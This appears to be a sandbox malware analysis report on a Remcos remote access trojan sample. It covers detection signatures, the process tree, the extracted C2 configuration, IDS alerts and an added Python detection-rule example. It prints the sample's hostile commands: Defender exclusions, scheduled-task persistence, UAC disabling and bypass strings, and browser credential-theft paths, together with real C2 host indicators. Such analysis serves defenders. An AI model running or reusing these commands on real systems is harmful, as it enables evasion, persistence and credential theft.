
Windows Analysis Report
SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe

Overview

General Information

Sample name:SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe
Analysis ID:1518542
MD5:64219e1931808919fd05dcfb458dfc25
SHA1:6adb1561418be08ccaa2e448166bc36673ec60c5
SHA256:ceebb7ca5adbb69127cbf5205e49840c4846cb46e4c5ac568557e7bdf9fe315c
Tags:exe
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Remcos RAT
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionality to change the wallpaper
Delayed program exit found
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Uses dynamic DNS services
Uses schtasks.exe or at.exe to add and modify task schedules
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch and control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe (PID: 5684 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe" MD5: 64219E1931808919FD05DCFB458DFC25)
    • powershell.exe (PID: 4208 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 4536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 5672 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 5452 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 5888 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 5380 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZRuVeAoBoxootS" /XML "C:\Users\user\AppData\Local\Temp\tmpAAF6.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 4680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • ZRuVeAoBoxootS.exe (PID: 5584 cmdline: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe MD5: 64219E1931808919FD05DCFB458DFC25)
    • schtasks.exe (PID: 4908 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZRuVeAoBoxootS" /XML "C:\Users\user\AppData\Local\Temp\tmpC13D.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 3776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • ZRuVeAoBoxootS.exe (PID: 4944 cmdline: "C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe" MD5: 64219E1931808919FD05DCFB458DFC25)
    • ZRuVeAoBoxootS.exe (PID: 4680 cmdline: "C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe" MD5: 64219E1931808919FD05DCFB458DFC25)
  • cleanup
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Host:Port:Password": "127.0.0.1:52121:1officerem.duckdns.org:52121:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Remcos", "Hide file": "Disable", "Mutex": "Rmc-6GPUH1", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
Source | Rule | Description | Author | Strings
00000010.00000002.1673960846.0000000000CEB000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000009.00000002.4037939289.0000000001017000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Windows_Trojan_Remcos_b296e965 | unknown | unknown
        • 0x691e0:$a1: Remcos restarted by watchdog!
        • 0x69738:$a3: %02i:%02i:%02i:%03i
        • 0x69abd:$a4: * Remcos v
        00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp | REMCOS_RAT_variants | unknown | unknown
        • 0x641e4:$str_a1: C:\Windows\System32\cmd.exe
        • 0x64160:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
        • 0x64160:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
        • 0x63610:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
        • 0x63e48:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
        • 0x6320c:$str_b2: Executing file:
        • 0x64328:$str_b3: GetDirectListeningPort
        • 0x63c08:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
        • 0x63e30:$str_b7: \update.vbs
        • 0x63234:$str_b9: Downloaded file:
        • 0x63220:$str_b10: Downloading file:
        • 0x632c4:$str_b12: Failed to upload file:
        • 0x642f0:$str_b13: StartForward
        • 0x64310:$str_b14: StopForward
        • 0x63dd8:$str_b15: fso.DeleteFile "
        • 0x63d6c:$str_b16: On Error Resume Next
        • 0x63e08:$str_b17: fso.DeleteFolder "
        • 0x632b4:$str_b18: Uploaded file:
        • 0x63274:$str_b19: Unable to delete:
        • 0x63da0:$str_b20: while fso.FileExists("
        • 0x63749:$str_c0: [Firefox StoredLogins not found]
        (table truncated; the full report lists 10 entries)
        Source | Rule | Description | Author | Strings
        16.2.ZRuVeAoBoxootS.exe.400000.0.unpack | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
        16.2.ZRuVeAoBoxootS.exe.400000.0.unpack | Windows_Trojan_Remcos_b296e965 | unknown | unknown
          • 0x679e0:$a1: Remcos restarted by watchdog!
          • 0x67f38:$a3: %02i:%02i:%02i:%03i
          • 0x682bd:$a4: * Remcos v
          16.2.ZRuVeAoBoxootS.exe.400000.0.unpack | REMCOS_RAT_variants | unknown | unknown
          • 0x629e4:$str_a1: C:\Windows\System32\cmd.exe
          • 0x62960:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
          • 0x62960:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
          • 0x61e10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
          • 0x62648:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
          • 0x61a0c:$str_b2: Executing file:
          • 0x62b28:$str_b3: GetDirectListeningPort
          • 0x62408:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
          • 0x62630:$str_b7: \update.vbs
          • 0x61a34:$str_b9: Downloaded file:
          • 0x61a20:$str_b10: Downloading file:
          • 0x61ac4:$str_b12: Failed to upload file:
          • 0x62af0:$str_b13: StartForward
          • 0x62b10:$str_b14: StopForward
          • 0x625d8:$str_b15: fso.DeleteFile "
          • 0x6256c:$str_b16: On Error Resume Next
          • 0x62608:$str_b17: fso.DeleteFolder "
          • 0x61ab4:$str_b18: Uploaded file:
          • 0x61a74:$str_b19: Unable to delete:
          • 0x625a0:$str_b20: while fso.FileExists("
          • 0x61f49:$str_c0: [Firefox StoredLogins not found]
          16.2.ZRuVeAoBoxootS.exe.400000.0.unpack | INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer | detects Windows executables potentially bypassing UAC using eventvwr.exe | ditekSHen
          • 0x61900:$s1: \Classes\mscfile\shell\open\command
          • 0x61960:$s1: \Classes\mscfile\shell\open\command
          • 0x61948:$s2: eventvwr.exe
          16.2.ZRuVeAoBoxootS.exe.400000.0.raw.unpack | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
          (table truncated; the full report lists 20 entries)

            System Summary

            Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe, ParentProcessId: 5684, ParentProcessName: SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe", ProcessId: 4208, ProcessName: powershell.exe
            Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe, ParentProcessId: 5684, ParentProcessName: SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe", ProcessId: 4208, ProcessName: powershell.exe
            Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZRuVeAoBoxootS" /XML "C:\Users\user\AppData\Local\Temp\tmpC13D.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZRuVeAoBoxootS" /XML "C:\Users\user\AppData\Local\Temp\tmpC13D.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe, ParentImage: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe, ParentProcessId: 5584, ParentProcessName: ZRuVeAoBoxootS.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZRuVeAoBoxootS" /XML "C:\Users\user\AppData\Local\Temp\tmpC13D.tmp", ProcessId: 4908, ProcessName: schtasks.exe
            Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZRuVeAoBoxootS" /XML "C:\Users\user\AppData\Local\Temp\tmpAAF6.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZRuVeAoBoxootS" /XML "C:\Users\user\AppData\Local\Temp\tmpAAF6.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe, ParentProcessId: 5684, ParentProcessName: SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZRuVeAoBoxootS" /XML "C:\Users\user\AppData\Local\Temp\tmpAAF6.tmp", ProcessId: 5380, ProcessName: schtasks.exe
            Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe, ParentProcessId: 5684, ParentProcessName: SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe", ProcessId: 4208, ProcessName: powershell.exe
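The Sigma hits above reduce to two behaviours: a Defender exclusion added through Add-MpPreference, and a scheduled task imported from an XML file in %TEMP%, both spawned by a binary living in a user-writable directory. The Python below is an added example, not part of the report and not any of the Sigma rules it cites; it re-implements those checks over constructed Sysmon-style events. Three events reproduce the command lines and parents from the process tree (PIDs 4208, 5380, 4908); the other two are constructed, a benign task import from C:\ProgramData and an -EncodedCommand variant of the same exclusion, which a plain command-line match would miss. The rule names, the event field names and the benign/encoded samples are the example's own.

```python
import base64
import re
from typing import Dict, List

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
DROPPER = r"C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe"
COPY = r"C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe"
# Constructed: the same exclusion, UTF-16LE base64 encoded as PowerShell expects.
ENCODED = base64.b64encode(
    r"Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming".encode("utf-16-le")
).decode()

# Constructed Sysmon-style process-creation events (PIDs 4208/5380/4908 copy
# the report's process tree; 9001 and 9002 are made up for the edge cases).
EVENTS = [
    {"pid": 4208, "parent": DROPPER, "image": PS,
     "cmd": f'"{PS}" Add-MpPreference -ExclusionPath "{DROPPER}"'},
    {"pid": 5380, "parent": DROPPER, "image": r"C:\Windows\System32\schtasks.exe",
     "cmd": r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZRuVeAoBoxootS" /XML "C:\Users\user\AppData\Local\Temp\tmpAAF6.tmp"'},
    {"pid": 4908, "parent": COPY, "image": r"C:\Windows\System32\schtasks.exe",
     "cmd": r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZRuVeAoBoxootS" /XML "C:\Users\user\AppData\Local\Temp\tmpC13D.tmp"'},
    {"pid": 9001, "parent": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\schtasks.exe",
     "cmd": r'schtasks.exe /Create /TN "Corp\Inventory" /XML "C:\ProgramData\Corp\inventory.xml"'},
    {"pid": 9002, "parent": r"C:\Users\user\AppData\Roaming\dropper.exe", "image": PS,
     "cmd": f'"{PS}" -nop -w hidden -enc {ENCODED}'},
]

EXCLUSION_RE = re.compile(r"(Add|Set)-MpPreference\b.*?-Exclusion(Path|Process|Extension)\b", re.I)
TEMP_XML_RE = re.compile(r"/xml\s+\"?[^\"]*\\Temp\\", re.I)
ENC_RE = re.compile(r"\s-(e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
USER_WRITABLE_RE = re.compile(r"\\Users\\[^\\]+\\(Desktop|Downloads|AppData)\\", re.I)
LOLBINS = {"powershell.exe", "schtasks.exe"}


def effective_command(cmd: str) -> str:
    """Command line plus any -EncodedCommand payload decoded from UTF-16LE base64."""
    m = ENC_RE.search(cmd)
    if not m:
        return cmd
    try:
        decoded = base64.b64decode(m.group(2)).decode("utf-16-le", errors="ignore")
    except ValueError:
        return cmd
    return cmd + " " + decoded


def evaluate(event: dict) -> List[str]:
    """Return the names of the rules that fire for one process-creation event."""
    hits = []
    cmd = effective_command(event["cmd"])
    image = event["image"].rsplit("\\", 1)[-1].lower()
    if image == "powershell.exe" and EXCLUSION_RE.search(cmd):
        hits.append("defender_exclusion")
    if image == "schtasks.exe" and re.search(r"/create\b", cmd, re.I) and TEMP_XML_RE.search(cmd):
        hits.append("schtasks_xml_from_temp")
    if image in LOLBINS and USER_WRITABLE_RE.search(event["parent"]):
        hits.append("lolbin_from_user_writable_parent")
    return hits


def hunt(events: List[dict]) -> Dict[int, List[str]]:
    """Map PID -> fired rule names; PIDs with no hits are omitted."""
    findings: Dict[int, List[str]] = {}
    for event in events:
        hits = evaluate(event)
        if hits:
            findings[event["pid"]] = hits
    return findings


if __name__ == "__main__":
    for pid, rules in hunt(EVENTS).items():
        print(pid, rules)
```

The decode step is what separates this from a string match on "Add-MpPreference": an encoded command line contains none of the cmdlet's characters, which is why Sigma's base64offset modifier exists for this case. The parent-path rule is deliberately broad (anything under Desktop, Downloads or AppData); in production it is the combination with one of the other two rules, as in PIDs 4208 and 5380 here, that should raise severity, not the parent path alone.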

            Persistence and Installation Behavior

            Source: Process started | Author: Joe Security | Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZRuVeAoBoxootS" /XML "C:\Users\user\AppData\Local\Temp\tmpAAF6.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZRuVeAoBoxootS" /XML "C:\Users\user\AppData\Local\Temp\tmpAAF6.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe, ParentProcessId: 5684, ParentProcessName: SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZRuVeAoBoxootS" /XML "C:\Users\user\AppData\Local\Temp\tmpAAF6.tmp", ProcessId: 5380, ProcessName: schtasks.exe

            Stealing of Sensitive Information

            Source: Registry Key set | Author: Joe Security | Data: Details: CD B5 9A 92 47 8D A0 C9 DB A5 E5 62 61 1B 8F D2 87 BC FF 6B 8B 9D FE A1 34 0F 60 20 81 1F 4C 8F 77 59 C1 AE 37 0D 48 33 31 B3 8F E8 C4 BF 48 15 DC F2 8E A0 2C 9F D4 A3 81 43 75 2C 6E 00 46 32 08 C6 F5 2D 0C 5C EF 5F 40 C0 09 D0 C6 24 FB E2 B4 FD 18 41 AA BE 1A C4 88 26 89 82 87 33 A8 D9 EE 7A 86 E4 C6 B3 DC 63 DA 9C 68 CF FC 15 4C 90 53 F3 E5 0F 62 98 12 5C 33 8F 5A F7 20 64 20 BB FA E1 BC 9C CA 15 2E 43 , EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe, ProcessId: 5292, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-6GPUH1\exepath

            Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
            2024-09-25T19:45:42.434528+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49709 | 103.186.116.145 | 52121 | TCP
            2024-09-25T19:49:02.169178+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49719 | 103.186.116.145 | 52121 | TCP
            2024-09-25T19:49:02.450423+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.9 | 49720 | 103.186.116.145 | 52121 | TCP

            Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
            2024-09-25T19:45:46.455735+0200 | 2803304 | 3 | Unknown Traffic | 192.168.2.9 | 49712 | 178.237.33.50 | 80 | TCP


            AV Detection

            Source: 00000010.00000002.1673960846.0000000000CEB000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: Remcos {"Host:Port:Password": "127.0.0.1:52121:1officerem.duckdns.org:52121:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Remcos", "Hide file": "Disable", "Mutex": "Rmc-6GPUH1", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe | ReversingLabs: Detection: 21%
            Source: SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe | ReversingLabs: Detection: 21%
            Source: Yara match | File source: 16.2.ZRuVeAoBoxootS.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 16.2.ZRuVeAoBoxootS.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.4114448.5.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.428fe30.6.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.428fe30.6.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.4114448.5.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.405d428.4.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000010.00000002.1673960846.0000000000CEB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000009.00000002.4037939289.0000000001017000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000002.1602310441.0000000003F99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe PID: 5684, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe PID: 5292, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: ZRuVeAoBoxootS.exe PID: 4680, type: MEMORYSTR
            Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe | Joe Sandbox ML: detected
            Source: SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe | Joe Sandbox ML: detected
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe | Code function: 16_2_004315EC CryptAcquireContextA,CryptGenRandom,CryptReleaseContext
            Source: SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe, 00000000.00000002.1602310441.0000000003F99000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: -----BEGIN PUBLIC KEY-----memstr_77a1306a-a
            Source: SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: wGsy.pdb | source: SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe, ZRuVeAoBoxootS.exe.0.dr
            Source: Binary string: wGsy.pdbSHA256 | source: SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe, ZRuVeAoBoxootS.exe.0.dr
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe | Code function: 16_2_0041A01B FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe | Code function: 16_2_0040B28E FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe | Code function: 16_2_0040838E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose
